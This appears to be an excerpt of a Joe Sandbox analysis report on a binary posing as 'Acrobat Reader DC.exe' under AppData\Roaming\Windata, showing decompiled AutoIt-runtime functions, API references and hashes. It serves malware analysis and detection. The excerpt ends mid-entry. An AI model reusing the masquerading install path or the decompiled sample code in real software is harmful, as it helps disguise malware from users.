                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                  • String ID:
                                  • API String ID: 3771399671-0
                                  • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                  • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                  • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                  • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00434621(void* __ecx, int _a4, int _a8, int _a12) {
                                  				long _v8;
                                  				int _t16;
                                  				long _t17;
                                  				long _t19;
                                  				long _t22;
                                  				long _t24;
                                  				long _t32;
                                  				long _t33;
                                  				long _t35;
                                  				struct HWND__* _t38;
                                  				long _t43;
                                  				void* _t55;
                                  
                                  				_t38 = _a8;
                                  				if(_t38 != 0) {
                                  					L2:
                                  					_a8 = 0;
                                  					_v8 = 0;
                                  					_t43 = GetCurrentThreadId();
                                  					if(_a12 == 0) {
                                  						if(_t38 != 0) {
                                  							_t17 =  *0x4a95bc; // 0x0
                                  							AttachThreadInput(_t43, _t17, 0);
                                  							_t33 =  *0x4a95c0; // 0x0
                                  							_t19 =  *0x4a95bc; // 0x0
                                  							if(_t33 != _t19) {
                                  								AttachThreadInput(_t33, _t19, 0);
                                  							}
                                  						}
                                  						_t32 =  *0x4a95c0; // 0x0
                                  						_t16 = AttachThreadInput(_t43, _t32, 0);
                                  						goto L18;
                                  					} else {
                                  						_t22 = GetWindowThreadProcessId(GetForegroundWindow(), 0);
                                  						 *0x4a95c0 = _t22;
                                  						_a12 = AttachThreadInput(_t43, _t22, 1);
                                  						if(_t38 == 0) {
                                  							_t16 = _v8;
                                  						} else {
                                  							_t24 = GetWindowThreadProcessId(_t38,  &_v8);
                                  							_t35 =  *0x4a95c0; // 0x0
                                  							 *0x4a95bc = _t24;
                                  							if(_t35 != _t24) {
                                  								_a8 = AttachThreadInput(_t35, _t24, 1);
                                  								_t24 =  *0x4a95bc; // 0x0
                                  							}
                                  							_t16 = AttachThreadInput(_t43, _t24, 1);
                                  						}
                                  						if(_a12 != 0 || _a8 != 0 || _t16 != 0) {
                                  							L18:
                                  							goto L19;
                                  						} else {
                                  							_t16 =  *0x4a95c0; // 0x0
                                  							if(_t43 != _t16) {
                                  								goto L18;
                                  							} else {
                                  								_t55 = _t16 -  *0x4a95bc; // 0x0
                                  								if(_t55 != 0) {
                                  									goto L18;
                                  								} else {
                                  									 *((intOrPtr*)(_a4 + 0x20)) = 0;
                                  									return _t16;
                                  								}
                                  							}
                                  						}
                                  					}
                                  				} else {
                                  					_t16 = _a4;
                                  					if( *((intOrPtr*)(_t16 + 9)) == 0) {
                                  						L19:
                                  						return _t16;
                                  					} else {
                                  						goto L2;
                                  					}
                                  				}
                                  			}
















                                  APIs
                                  • GetCurrentThreadId.KERNEL32 ref: 00434643
                                  • GetForegroundWindow.USER32(00000000), ref: 00434655
                                  • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                  • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                  • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                  • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                  • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                  • String ID:
                                  • API String ID: 2156557900-0
                                  • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                  • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                  • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                  • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 83%
                                  			E004542ED(void* _a4, signed int _a8, signed int _a12, intOrPtr _a16, _Unknown_base(*)()* _a20, intOrPtr* _a24, intOrPtr* _a28) {
                                  				signed int _v8;
                                  				void* _v12;
                                  				void* _v16;
                                  				intOrPtr _v20;
                                  				signed int _v24;
                                  				signed int __edi;
                                  				signed int __esi;
                                  				intOrPtr _t118;
                                  				intOrPtr* _t122;
                                  				intOrPtr* _t124;
                                  				intOrPtr* _t128;
                                  				intOrPtr _t134;
                                  				intOrPtr _t135;
                                  				struct HINSTANCE__** _t144;
                                  				void* _t147;
                                  				void* _t151;
                                  				struct HINSTANCE__* _t155;
                                  				intOrPtr* _t158;
                                  				signed int _t159;
                                  				intOrPtr _t160;
                                  				signed int _t168;
                                  				signed int _t173;
                                  				struct HINSTANCE__* _t181;
                                  				signed int _t187;
                                  				signed int _t195;
                                  				signed int _t200;
                                  				signed int _t201;
                                  				intOrPtr* _t202;
                                  				intOrPtr* _t203;
                                  				intOrPtr* _t204;
                                  				void* _t205;
                                  				void* _t206;
                                  				void* _t207;
                                  
                                  				_t158 = _a4;
                                  				_t203 = _a20;
                                  				_t200 = 0;
                                  				 *_a28 = 0;
                                  				 *_a24 = 0;
                                  				E00408F40(0, _t203);
                                  				 *((intOrPtr*)(_t203 + 8)) = 1;
                                  				 *_t203 = 1;
                                  				_t118 =  *((intOrPtr*)(_t158 + 8));
                                  				_a20 = 0;
                                  				_v16 = 0;
                                  				_v20 = _t118;
                                  				if(_t118 <= 0) {
                                  					L13:
                                  					return 6;
                                  				} else {
                                  					while(_a20 == 0) {
                                  						_t188 =  *(_t158 + 4);
                                  						_t144 = ( *(_t158 + 4))[_t200];
                                  						if( *_t144 == 0) {
                                  							L11:
                                  							_t200 = _t200 + 1;
                                  							if(_t200 < _v20) {
                                  								continue;
                                  							} else {
                                  								if(_a20 != 0) {
                                  									break;
                                  								} else {
                                  									goto L13;
                                  								}
                                  							}
                                  						} else {
                                  							_t188 =  *_t144;
                                  							_v8 = 0;
                                  							if( *((intOrPtr*)( *_t144 + 4)) <= 0) {
                                  								goto L11;
                                  							} else {
                                  								_a4 = 0;
                                  								while(1) {
                                  									_t147 = E00422EED(_t200, _t203, _a8,  *((intOrPtr*)( *((intOrPtr*)( *_t144 + 8)) + _a4)));
                                  									_t205 = _t205 + 8;
                                  									if(_t147 == 0) {
                                  										break;
                                  									}
                                  									_t144 = ( *(_t158 + 4))[_t200];
                                  									_t188 =  *_t144;
                                  									_a4 = _a4 + 0xc;
                                  									_t187 = _v8 + 1;
                                  									_v8 = _t187;
                                  									if(_t187 <  *((intOrPtr*)( *_t144 + 4))) {
                                  										continue;
                                  									} else {
                                  										goto L11;
                                  									}
                                  									goto L46;
                                  								}
                                  								_t181 = ( *(( *(_t158 + 4))[_t200]))[2];
                                  								_t195 = _a12;
                                  								_t151 = _v8 + _v8 * 2 + _v8 + _v8 * 2 + _v8 + _v8 * 2 + _v8 + _v8 * 2;
                                  								if(_t195 <  *((intOrPtr*)(_t181 + _t151 + 4)) || _t195 >  *((intOrPtr*)(_t181 + _t151 + 8))) {
                                  									return 7;
                                  								} else {
                                  									_a20 = GetProcAddress( *( *(( *(_t158 + 4))[_t200])),  *(( *(( *(_t158 + 4))[_t200]))[2] + _t151));
                                  									_t155 =  *(_t158 + 4);
                                  									_t188 =  *( *(_t155[_t200]));
                                  									_v16 = GetProcAddress( *( *(_t155[_t200])), "AU3_FreeVar");
                                  									goto L11;
                                  								}
                                  							}
                                  						}
                                  						goto L46;
                                  					}
                                  					_t201 = _a12;
                                  					_t122 = E004135BB(_t188, _t201, _t203, _t201 << 4);
                                  					_t159 = 0;
                                  					_t206 = _t205 + 4;
                                  					_a4 = _t122;
                                  					_a8 = 0;
                                  					if(_t201 > 0) {
                                  						_t202 = _t122;
                                  						do {
                                  							_t134 = _a16;
                                  							_t173 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t134 + 4)) + _t159 * 4)) + 8)) + 0xfffffffe;
                                  							if(_t173 > 5) {
                                  								L25:
                                  								 *_t202 = 1;
                                  								_t135 = E0040C650( *((intOrPtr*)( *((intOrPtr*)(_t134 + 4)) + _t159 * 4)));
                                  								goto L26;
                                  							} else {
                                  								switch( *((intOrPtr*)(_t173 * 4 +  &M00454611))) {
                                  									case 0:
                                  										 *__edi = 2;
                                  										__edx =  *(__eax + 4);
                                  										__eax =  *( *(__eax + 4) + __ebx * 4);
                                  										__eax = E00443006( *( *(__eax + 4) + __ebx * 4));
                                  										 *(__edi + 0xc) = __edx;
                                  										goto L26;
                                  									case 1:
                                  										 *__edi = 3;
                                  										__ecx =  *(__eax + 4);
                                  										__ecx =  *( *(__eax + 4) + __ebx * 4);
                                  										__eax = E0040BAA0(__ecx);
                                  										 *(__edi + 8) = __fp0;
                                  										goto L27;
                                  									case 2:
                                  										 *_t202 = 4;
                                  										_t163 = E0040F6F0(E0045340C( *((intOrPtr*)( *((intOrPtr*)(_t134 + 4)) + _t159 * 4))), _t173 | 0xffffffff, _t203);
                                  										_t141 = E004135BB(_t192, _t202, _t203, E00413530(_t163) + 1);
                                  										_t211 = _t206 + 8;
                                  										 *((intOrPtr*)(_t202 + 8)) = _t141;
                                  										if(_t141 != 0) {
                                  											E00413650(_t141, _t163);
                                  											_t211 = _t211 + 8;
                                  										}
                                  										_push(_t163);
                                  										E004111DC();
                                  										_t159 = _a8;
                                  										_t206 = _t211 + 4;
                                  										goto L27;
                                  									case 3:
                                  										goto L25;
                                  									case 4:
                                  										 *__edi = 5;
                                  										__eax =  *(__eax + __ebx * 4);
                                  										__eax = E0044B3AC(__eax);
                                  										L26:
                                  										 *((intOrPtr*)(_t202 + 8)) = _t135;
                                  										goto L27;
                                  								}
                                  							}
                                  							L27:
                                  							_t159 = _t159 + 1;
                                  							_t202 = _t202 + 0x10;
                                  							_a8 = _t159;
                                  						} while (_t159 < _a12);
                                  						_t201 = _a12;
                                  						_t122 = _a4;
                                  					}
                                  					_v12 = 0;
                                  					_a20(_t201, _t122,  &_v12, _a24, _a28);
                                  					_t124 = _v12;
                                  					_t207 = _t206 + 0x14;
                                  					if(_t124 != 0) {
                                  						_t168 =  *_t124 + 0xfffffffe;
                                  						if(_t168 > 3) {
                                  							_t160 =  *((intOrPtr*)(_t124 + 8));
                                  							E00408F40(_t201, _t203);
                                  							 *((intOrPtr*)(_t203 + 8)) = 1;
                                  							goto L37;
                                  						} else {
                                  							switch( *((intOrPtr*)(_t168 * 4 +  &M00454629))) {
                                  								case 0:
                                  									_t160 =  *((intOrPtr*)(_t124 + 8));
                                  									_v20 =  *((intOrPtr*)(_t124 + 0xc));
                                  									E00408F40(_t201, _t203);
                                  									 *((intOrPtr*)(_t203 + 8)) = 2;
                                  									 *((intOrPtr*)(_t203 + 4)) = _v20;
                                  									goto L37;
                                  								case 1:
                                  									__fp0 =  *(__eax + 8);
                                  									_v24 =  *(__eax + 8);
                                  									__eax = E00408F40(__edi, __esi);
                                  									__fp0 = _v24;
                                  									 *((intOrPtr*)(__esi + 8)) = 3;
                                  									 *__esi = _v24;
                                  									goto L38;
                                  								case 2:
                                  									__edx =  *(__eax + 8);
                                  									__eax = E0043299A( *(__eax + 8), 0xffffffff);
                                  									__ebx = __esi;
                                  									__edi = __eax;
                                  									__eax = E0040E710(__eax, __esi, __ecx);
                                  									_push(__edi);
                                  									__eax = E004111DC();
                                  									__edi = _a12;
                                  									__esp = __esp + 4;
                                  									goto L38;
                                  								case 3:
                                  									__ebx =  *(__eax + 8);
                                  									__eax = E00408F40(__edi, __esi);
                                  									 *((intOrPtr*)(__esi + 8)) = 7;
                                  									L37:
                                  									 *_t203 = _t160;
                                  									goto L38;
                                  							}
                                  						}
                                  						L38:
                                  						if(_t201 > 0) {
                                  							_t204 = _a4;
                                  							do {
                                  								if( *_t204 == 4) {
                                  									E00413748( *((intOrPtr*)(_t204 + 8)));
                                  									_t207 = _t207 + 4;
                                  								}
                                  								_t204 = _t204 + 0x10;
                                  								_t201 = _t201 - 1;
                                  							} while (_t201 != 0);
                                  						}
                                  						E00413748(_a4);
                                  						_t128 = _v16;
                                  						if(_t128 != 0) {
                                  							 *_t128(_v12);
                                  						}
                                  					}
                                  					return 0;
                                  				}
                                  				L46:
                                  			}





































                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: AddressProc_free_malloc$_strlen
                                  • String ID: AU3_FreeVar
                                  • API String ID: 3358881862-771828931
                                  • Opcode ID: 9189223602f4225252d80b21b209c7ea8eb6c5ba0733661d26557e2285be57dc
                                  • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                  • Opcode Fuzzy Hash: 9189223602f4225252d80b21b209c7ea8eb6c5ba0733661d26557e2285be57dc
                                  • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0045FBAC(struct HMENU__** _a4, short _a8, short* _a12, int _a16, int _a20, intOrPtr _a24) {
                                  				struct tagMENUITEMINFOW _v52;
                                  				int _t44;
                                  				int _t50;
                                  				struct HMENU__* _t53;
                                  				int _t54;
                                  				short _t58;
                                  				struct HMENU__* _t64;
                                  				int _t65;
                                  				int _t66;
                                  				struct HMENU__* _t68;
                                  				struct HMENU__** _t70;
                                  				int _t74;
                                  				short* _t76;
                                  				int _t79;
                                  				signed int _t87;
                                  				struct HMENU__** _t93;
                                  
                                  				_t44 = _a16;
                                  				_t70 = _a4;
                                  				if(_t44 == 0xffffffff || _t44 >= 7 && _t44 < 0x207) {
                                  					_t87 = E0044C2C9(_t70);
                                  					if(_t87 == 0xffffffff) {
                                  						goto L29;
                                  					} else {
                                  						_t93 =  *(_t70 + 0x1b4 + _t87 * 4);
                                  						_v52.cbSize = 0x30;
                                  						E00412F40( &(_v52.fMask), 0, 0x2c);
                                  						_t49 = _a16;
                                  						if(_a16 != 0xffffffff) {
                                  							_a16 = 0xffffffff;
                                  							_t50 = E00434179(_t70, _t49,  &_a16);
                                  							__eflags = _t50;
                                  							if(_t50 == 0) {
                                  								L28:
                                  								E0044422D(_t70, _t87);
                                  								goto L29;
                                  							} else {
                                  								_t74 = _a16;
                                  								_v52.fMask = 4;
                                  								_t53 =  *( *(_t70 + 0x1b4 + _t74 * 4));
                                  								 *_t93 = _t53;
                                  								_t54 = GetMenuItemInfoW(_t53, _t74, 0,  &_v52);
                                  								__eflags = _t54;
                                  								if(_t54 == 0) {
                                  									goto L28;
                                  								} else {
                                  									 *_t93 = _v52.hSubMenu;
                                  									__eflags = IsMenu(_v52.hSubMenu);
                                  									if(__eflags == 0) {
                                  										goto L28;
                                  									} else {
                                  										goto L9;
                                  									}
                                  								}
                                  							}
                                  						} else {
                                  							 *_t93 =  *_t70;
                                  							L9:
                                  							_t58 = _a8;
                                  							_t76 = _a12;
                                  							_t93[1] = 0;
                                  							_v52.fMask = 0x32;
                                  							_v52.fType = 0;
                                  							_v52.dwTypeData = _t76;
                                  							_v52.dwItemData = _t87;
                                  							_v52.wID = _t87;
                                  							if(_t58 == 0) {
                                  								__eflags =  *_t76;
                                  								if( *_t76 != 0) {
                                  									__eflags = _a24 - 1;
                                  									if(_a24 == 1) {
                                  										_v52.fType = 0x200;
                                  										_t93[1] = 1;
                                  									}
                                  								} else {
                                  									_v52.fType = 0x800;
                                  								}
                                  								_t93[1] = 0;
                                  								goto L19;
                                  							} else {
                                  								if(_t58 != 1) {
                                  									L19:
                                  									__eflags = _t70[1];
                                  									if(_t70[1] != 0) {
                                  										__eflags = _t70[2];
                                  										if(_t70[2] != 0) {
                                  											__eflags = _t87 - 7;
                                  											if(_t87 >= 7) {
                                  												_t64 =  *_t70;
                                  												__eflags =  *_t93 - _t64;
                                  												if( *_t93 == _t64) {
                                  													_t65 = GetMenuItemCount(_t64);
                                  													_t79 = _a20;
                                  													__eflags = _t79 - 0xffffffff;
                                  													if(_t79 == 0xffffffff) {
                                  														L25:
                                  														_t66 = _t65 + 0xfffffffc;
                                  														__eflags = _t66;
                                  														_a20 = _t66;
                                  													} else {
                                  														_t39 = _t65 - 4; // -4
                                  														__eflags = _t79 + 1 - _t39;
                                  														if(_t79 + 1 > _t39) {
                                  															goto L25;
                                  														}
                                  													}
                                  												}
                                  											}
                                  										}
                                  									}
                                  									__eflags = InsertMenuItemW( *_t93, _a20, 1,  &_v52);
                                  									if(__eflags == 0) {
                                  										goto L12;
                                  									} else {
                                  										_t70[0x275] = _t87;
                                  										return _t87;
                                  									}
                                  								} else {
                                  									_t68 = CreatePopupMenu();
                                  									_t106 = _t68;
                                  									if(_t68 != 0) {
                                  										_v52.fMask = _v52.fMask | 0x00000004;
                                  										_v52.hSubMenu = _t68;
                                  										_t93[1] = 1;
                                  										goto L19;
                                  									} else {
                                  										L12:
                                  										E0045FA41(_t70, _t106, _t87);
                                  										return 0;
                                  									}
                                  								}
                                  							}
                                  						}
                                  					}
                                  				} else {
                                  					L29:
                                  					__eflags = 0;
                                  					return 0;
                                  				}
                                  			}




















                                  APIs
                                  • _memset.LIBCMT ref: 0045FBFB
                                  • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                  • IsMenu.USER32 ref: 0045FC5F
                                  • CreatePopupMenu.USER32(00000000,?,76F033D0), ref: 0045FC97
                                  • GetMenuItemCount.USER32 ref: 0045FCFD
                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                  • String ID: 0$2
                                  • API String ID: 3311875123-3793063076
                                  • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                  • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                  • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                  • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 46%
                                  			E00434034(int _a4, char _a8) {
                                  				short _v520;
                                  				short _v1036;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				void* _t16;
                                  				void* _t21;
                                  				void* _t23;
                                  				void* _t24;
                                  				void* _t26;
                                  
                                  				LoadStringW(GetModuleHandleW(0), _a4,  &_v520, 0x100);
                                  				LoadStringW(GetModuleHandleW(0), 0x1389,  &_v1036, 0x100);
                                  				_t29 = _a8;
                                  				_t23 = _t21;
                                  				_t26 = _t24;
                                  				if(_a8 == 0) {
                                  					return MessageBoxW(0,  &_v1036,  &_v520, 0x11010);
                                  				} else {
                                  					_push(0x484ea8);
                                  					_push(0x484ea8);
                                  					_push( &_v1036);
                                  					_push(0);
                                  					_push( &_v520);
                                  					_push(L"%s (%d) : ==> %s: \n%s \n%s\n");
                                  					return E00413ABE(_t16,  &_v1036, _t23, _t26, _t29);
                                  				}
                                  			}














                                  APIs
                                  • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe), ref: 00434057
                                  • LoadStringW.USER32(00000000), ref: 00434060
                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                  • LoadStringW.USER32(00000000), ref: 00434078
                                  • _wprintf.LIBCMT ref: 004340A1
                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                  Strings
                                  • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                  • C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe, xrefs: 00434040
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: HandleLoadModuleString$Message_wprintf
                                  • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe
                                  • API String ID: 3648134473-4247470361
                                  • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                  • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                  • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                  • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 81%
                                  			E00441165(void* __edi, void* __esi, int _a4, intOrPtr _a8) {
                                  				signed int _t23;
                                  				int _t32;
                                  				intOrPtr _t33;
                                  				void* _t36;
                                  				struct HWND__* _t37;
                                  				void* _t41;
                                  				struct HWND__** _t42;
                                  
                                  				_t41 = __esi;
                                  				_t36 = __edi;
                                  				_t22 = _a8;
                                  				_t32 = _a4;
                                  				if(_a8 == 0) {
                                  					_t23 =  *0x4a869c; // 0xffffffff
                                  				} else {
                                  					_t23 = E00430C09(_t22, 0x4a8630, _t22);
                                  					 *0x4a869c = _t23;
                                  				}
                                  				if(_t23 != 0xffffffff) {
                                  					_t33 =  *0x4a8690; // 0x0
                                  					_push(_t41);
                                  					_t42 =  *( *(_t33 + _t23 * 4));
                                  					_push(_t36);
                                  					_t37 =  *_t42;
                                  					if(_t42[0xe] != 0) {
                                  						_t42[0xe] = 0;
                                  						if(_t42[0x64] >= 0 && _t42[0x67] != 0) {
                                  							E00440A0D(0x4a8630, _t42, _t42[0x66]);
                                  							_t42[0x67] = 0;
                                  						}
                                  					}
                                  					if(_t32 > 0x43) {
                                  						L24:
                                  						return 1;
                                  					} else {
                                  						switch( *((intOrPtr*)(( *(_t32 + 0x44131d) & 0x000000ff) * 4 +  &M004412F5))) {
                                  							case 0:
                                  								__eax = ShowWindow(__edi, 0);
                                  								_pop(__edi);
                                  								__esi[0xe] = 0;
                                  								_pop(__esi);
                                  								__eax = 1;
                                  								return 1;
                                  								goto L28;
                                  							case 1:
                                  								if(__esi[0xe] != 0) {
                                  									goto L19;
                                  								} else {
                                  									__eax = ShowWindow(__edi, __ebx);
                                  									if(__ebx != 8 && __ebx != 4) {
                                  										__eax = E00434418(__edi);
                                  									}
                                  									_pop(__edi);
                                  									__esi[0xe] = 1;
                                  									_pop(__esi);
                                  									__eax = 1;
                                  									return 1;
                                  								}
                                  								goto L28;
                                  							case 2:
                                  								__esi[0xe] = 1;
                                  								goto L17;
                                  							case 3:
                                  								if(_t42[0xe] == 0) {
                                  									goto L19;
                                  								} else {
                                  									ShowWindow(_t37, _t32);
                                  									E00434418(_t37);
                                  									return 1;
                                  								}
                                  								goto L28;
                                  							case 4:
                                  								L17:
                                  								if(__esi[0xe] == 0) {
                                  									L19:
                                  									return 0;
                                  								} else {
                                  									__eax = ShowWindow(__edi, 6);
                                  									_pop(__edi);
                                  									_pop(__esi);
                                  									__eax = 1;
                                  									return 1;
                                  								}
                                  								goto L28;
                                  							case 5:
                                  								__eax = EnableWindow(__edi, 1);
                                  								_pop(__edi);
                                  								_pop(__esi);
                                  								__eax = 1;
                                  								return 1;
                                  								goto L28;
                                  							case 6:
                                  								__eax = EnableWindow(__edi, 0);
                                  								_pop(__edi);
                                  								_pop(__esi);
                                  								__eax = 1;
                                  								return 1;
                                  								goto L28;
                                  							case 7:
                                  								__esi[0xe] = 1;
                                  								__eax = LockWindowUpdate(__edi);
                                  								_pop(__edi);
                                  								_pop(__esi);
                                  								__eax = 1;
                                  								return 1;
                                  								goto L28;
                                  							case 8:
                                  								__esi[0xe] = 0;
                                  								LockWindowUpdate(0) = InvalidateRect( *__esi, 0, 1);
                                  								goto L24;
                                  							case 9:
                                  								goto L24;
                                  						}
                                  					}
                                  				} else {
                                  					return 0;
                                  				}
                                  				L28:
                                  			}











                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                  • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                  • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
